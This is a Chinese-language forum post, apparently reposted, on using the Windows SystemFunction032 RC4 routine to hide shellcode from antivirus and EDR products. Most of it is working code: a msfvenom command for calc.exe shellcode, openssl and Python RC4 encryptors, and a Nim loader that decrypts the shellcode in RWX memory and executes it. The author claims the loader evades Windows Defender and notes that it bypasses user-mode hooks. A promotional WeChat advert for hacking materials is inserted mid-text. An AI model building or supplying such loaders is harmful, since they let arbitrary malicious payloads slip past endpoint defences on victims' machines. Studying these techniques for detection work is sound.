SystemFunction032函数的免杀研究

打印 上一主题 下一主题

主题 823|帖子 823|积分 2469

什么是SystemFunction032函数?

虽然Benjamin Delphi在2013年就已经在Mimikatz中使用了它,但由于我之前对它的研究并不多,才有了下文。
这个函数能够通过RC4加密方式对内存区域进行加密/解密。例如,ReactOS项目的代码中显示,它需要一个指向RC4_Context结构的指针作为输入,以及一个指向加密密钥的指针。
[img=720,423.6823104693141]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202211241535205.png[/img]
不过,目前来看,除了XOR操作,至少我个人还不知道其他的针对内存区域加密/解密的替代函数。但是,你可能在其他研究员的博客中也读到过关于规避内存扫描器的文章,使用简单的XOR操作,攻击者即使是使用了较长的密钥,也会被AV/EDR供应商检测到。
初步想法

虽然RC4算法被认为是不安全的,甚至多年来已经被各个安全厂商研究,但是它为我们提供了一个更好的内存规避的方式。如果我们直接使用AES,可能会更节省OpSec。但是一个简单的单一的Windows API是非常易于使用的。
通常情况下,如果你想在一个进程中执行Shellcode,你需要执行以下步骤。
1、打开一个到进程的句柄
2、在该进程中分配具有RW/RX或RWX权限的内存
3、将Shellcode写入该区域
4、(可选)将权限从RW改为RX,以便执行
5、以线程/APC/回调/其他方式执行Shellcode。
为了避免基于签名的检测,我们可以在执行前对我们的Shellcode进行加密并在运行时解密。
例如,对于AES解密,流程通常是这样的。
1、打开一个到进程的句柄
2、用RW/RX或RWX的权限在该进程中分配内存
3、解密Shellcode,这样我们就可以将shellcode的明文写入内存中
4、将Shellcode写入分配的区域中
5、(可选)把执行的权限从RW改为RX
6、以线程/APC/回调/其他方式执行Shellcode
在这种情况下,Shellcode本身在写入内存时可能会被发现,例如被用户区的钩子程序发现,因为我们需要把指向明文Shellcode的指针传递给WriteProcessMemory或NtWriteVirtualMemory。
XOR的使用可以很好的避免这一点,因为我们还可以在将加密的值写入内存后XOR解密内存区域。简单来讲就像这样。
1、为进程打开一个句柄
2、在该进程中以RW/RX或RWX的权限分配内存
3、将Shellcode写入分配的区域中
4、XOR解密Shellcode的内存区域
5、(可选)把执行的权限从RW改为RX
6、以线程/APC/回调/其他方式执行Shellcode。
但是XOR操作很容易被发现。所以我们尽可能不去使用这种方式。
这里有一个很好的替代方案,我们可以利用SystemFunction032来解密Shellcode,然后将其写入内存中。
【----帮助网安学习,以下所有学习资料免费领!加vx:yj009991,备注 “博客园” 获取!】
 ① 网安学习成长路径思维导图
 ② 60+网安经典常用工具包
 ③ 100+SRC漏洞分析报告
 ④ 150+网安攻防实战技术电子书
 ⑤ 最权威CISSP 认证考试指南+题库
 ⑥ 超1800页CTF实战技巧手册
 ⑦ 最新网安大厂面试题合集(含答案)
 ⑧ APP客户端安全检测指南(安卓+IOS)
生成POC

首先,我们需要生成Shellcode,然后使用OpenSSL对它进行RC4加密。因此,我们可以使用msfvenom来生成。
  1. msfvenom -p windows/x64/exec CMD=calc.exe -f raw -o calc.bin<br>cat calc.bin | openssl enc -rc4 -nosalt -k "aaaaaaaaaaaaaaaa" > enccalc.bin
复制代码
但后来在调试时发现,SystemFunction032的加密/解密方式与OpenSSL/RC4不同。所以我们不能这样做。
最终修改为
  1. openssl enc -rc4 -in calc.bin -K `echo -n 'aaaaaaaaaaaaaaaa' | xxd -p` -nosalt > enccalc.bin
复制代码
我们也可以使用下面的Nim代码来获得一个加密的Shellcode blob(仅Windows操作系统)。
  1. import winim
  2. import winim/lean
  3. # msfvenom -p windows/x64/exec CMD=calc.exe -f raw -o calc.bin
  4. const encstring = slurp"calc.bin"
  5. func toByteSeq*(str: string): seq[byte] {.inline.} =
  6.   ## Converts a string to the corresponding byte sequence.
  7.   @(str.toOpenArrayByte(0, str.high))
  8. proc SystemFunction032*(memoryRegion: pointer, keyPointer: pointer): NTSTATUS
  9.   {.discardable, stdcall, dynlib: "Advapi32", importc: "SystemFunction032".}
  10.   
  11. # This is the mentioned RC4 struct
  12. type
  13.     USTRING* = object
  14.         Length*: DWORD
  15.         MaximumLength*: DWORD
  16.         Buffer*: PVOID
  17. var keyString: USTRING
  18. var imgString: USTRING
  19. # Our encryption Key
  20. var keyBuf: array[16, char] = [char 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a']
  21. keyString.Buffer = cast[PVOID](&keyBuf)
  22. keyString.Length = 16
  23. keyString.MaximumLength = 16
  24. var shellcode = toByteSeq(encstring)
  25. var size  = len(shellcode)
  26. # We need to still get the Shellcode to memory to encrypt it with SystemFunction032
  27. let tProcess = GetCurrentProcessId()
  28. echo "Current Process ID: ", tProcess
  29. var pHandle: HANDLE = OpenProcess(PROCESS_ALL_ACCESS, FALSE, tProcess)
  30. echo "Process Handle: ", repr(pHandle)
  31. let rPtr = VirtualAllocEx(
  32.     pHandle,
  33.     NULL,
  34.     cast[SIZE_T](size),
  35.     MEM_COMMIT,
  36.     PAGE_READ_WRITE
  37. )
  38. copyMem(rPtr, addr shellcode[0], size)
  39. # Fill the RC4 struct
  40. imgString.Buffer = rPtr
  41. imgString.Length = cast[DWORD](size)
  42. imgString.MaximumLength = cast[DWORD](size)
  43. # Call SystemFunction032
  44. SystemFunction032(&imgString, &keyString)
  45. copyMem(addr shellcode[0],rPtr ,size)
  46. echo "Writing encrypted shellcode to dec.bin"
  47. writeFile("enc.bin", shellcode)
  48. # enc.bin contains our encrypted Shellcode
复制代码
之后,又写出了一个简单的Python脚本,用Python脚本简化了加密的过程。
  1. #!/usr/bin/env python3
  2. from typing import Iterator
  3. from base64 import b64encode
  4. # Stolen from: https://gist.github.com/hsauers5/491f9dde975f1eaa97103427eda50071
  5. def key_scheduling(key: bytes) -> list:
  6.     sched = [i for i in range(0, 256)]
  7.     i = 0
  8.     for j in range(0, 256):
  9.         i = (i + sched[j] + key[j % len(key)]) % 256
  10.         tmp = sched[j]
  11.         sched[j] = sched[i]
  12.         sched[i] = tmp
  13.     return sched
  14. def stream_generation(sched: list[int]) -> Iterator[bytes]:
  15.     i, j = 0, 0
  16.     while True:
  17.         i = (1 + i) % 256
  18.         j = (sched[i] + j) % 256
  19.         tmp = sched[j]
  20.         sched[j] = sched[i]
  21.         sched[i] = tmp
  22.         yield sched[(sched[i] + sched[j]) % 256]        
  23. def encrypt(plaintext: bytes, key: bytes) -> bytes:
  24.     sched = key_scheduling(key)
  25.     key_stream = stream_generation(sched)
  26.    
  27.     ciphertext = b''
  28.     for char in plaintext:
  29.         enc = char ^ next(key_stream)
  30.         ciphertext += bytes([enc])
  31.         
  32.     return ciphertext
  33. if __name__ == '__main__':
  34.     # msfvenom -p windows/x64/exec CMD=calc.exe -f raw -o calc.bin
  35.     with open('calc.bin', 'rb') as f:
  36.         result = encrypt(plaintext=f.read(), key=b'aaaaaaaaaaaaaaaa')
  37.     print(b64encode(result).decode())
复制代码
为了执行这个shellcode,我们可以简单地使用以下Nim代码。
  1. import winim
  2. import winim/lean
  3. # (OPTIONAL) do some Environmental Keying stuff
  4. # Encrypted with the previous code
  5. # Embed the encrypted Shellcode on compile time as string
  6. const encstring = slurp"enc.bin"
  7. func toByteSeq*(str: string): seq[byte] {.inline.} =
  8.   ## Converts a string to the corresponding byte sequence.
  9.   @(str.toOpenArrayByte(0, str.high))
  10. proc SystemFunction032*(memoryRegion: pointer, keyPointer: pointer): NTSTATUS
  11.   {.discardable, stdcall, dynlib: "Advapi32", importc: "SystemFunction032".}
  12. type
  13.     USTRING* = object
  14.         Length*: DWORD
  15.         MaximumLength*: DWORD
  16.         Buffer*: PVOID
  17. var keyString: USTRING
  18. var imgString: USTRING
  19. # Same Key
  20. var keyBuf: array[16, char] = [char 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a']
  21. keyString.Buffer = cast[PVOID](&keyBuf)
  22. keyString.Length = 16
  23. keyString.MaximumLength = 16
  24. var shellcode = toByteSeq(encstring)
  25. var size  = len(shellcode)
  26. let tProcess = GetCurrentProcessId()
  27. echo "Current Process ID: ", tProcess
  28. var pHandle: HANDLE = OpenProcess(PROCESS_ALL_ACCESS, FALSE, tProcess)
  29. let rPtr = VirtualAllocEx(
  30.     pHandle,
  31.     NULL,
  32.     cast[SIZE_T](size),
  33.     MEM_COMMIT,
  34.     PAGE_EXECUTE_READ_WRITE
  35. )
  36. copyMem(rPtr, addr shellcode[0], size)
  37. imgString.Buffer = rPtr
  38. imgString.Length = cast[DWORD](size)
  39. imgString.MaximumLength = cast[DWORD](size)
  40. # Decrypt memory region with SystemFunction032
  41. SystemFunction032(&imgString, &keyString)
  42. # (OPTIONAL) we could Sleep here with a custom Sleep function to avoid memory Scans
  43. # Directly call the Shellcode instead of using a Thread/APC/Callback/whatever
  44. let f = cast[proc(){.nimcall.}](rPtr)
  45. f()
复制代码
最终效果,至少windows defender不会报毒。
[img=720,445.9961315280464]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202211241535206.png[/img]
通过使用这个方法,我们几乎可以忽略用户区的钩子程序,因为我们的明文Shellcode从未被传递给任何函数(只有SystemFunction032本身)。当然,所有这些供应商都可以通过钩住Advapi32/SystemFunction032来检测我们。
后记

之后我想到了一个更加完美的想法。通过使用PIC-Code,我们也可以省去我的PoC中所使用的其他Win32函数。因为在编写PIC-Code时,所有的代码都已经被包含在了.text部分,而这个部分通常默认有RX权限,这在很多情况下是已经足够了。所以我们不需要改变内存权限,也不需要把Shellcode写到内存中。
简单来讲是以下这种情况:
1、调用SystemFunction032来解密Shellcode
2、直接调用它
例如,PIC-Code的样本代码可以在这里找到。对于Nim语言来说,之前发布了一个库,它也能让我们相对容易地编写PIC代码,叫做Bitmancer。
更多靶场实验练习、网安学习资料,请点击这里>>
 

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

缠丝猫

金牌会员
这个人很懒什么都没写!

标签云

快速回复 返回顶部 返回列表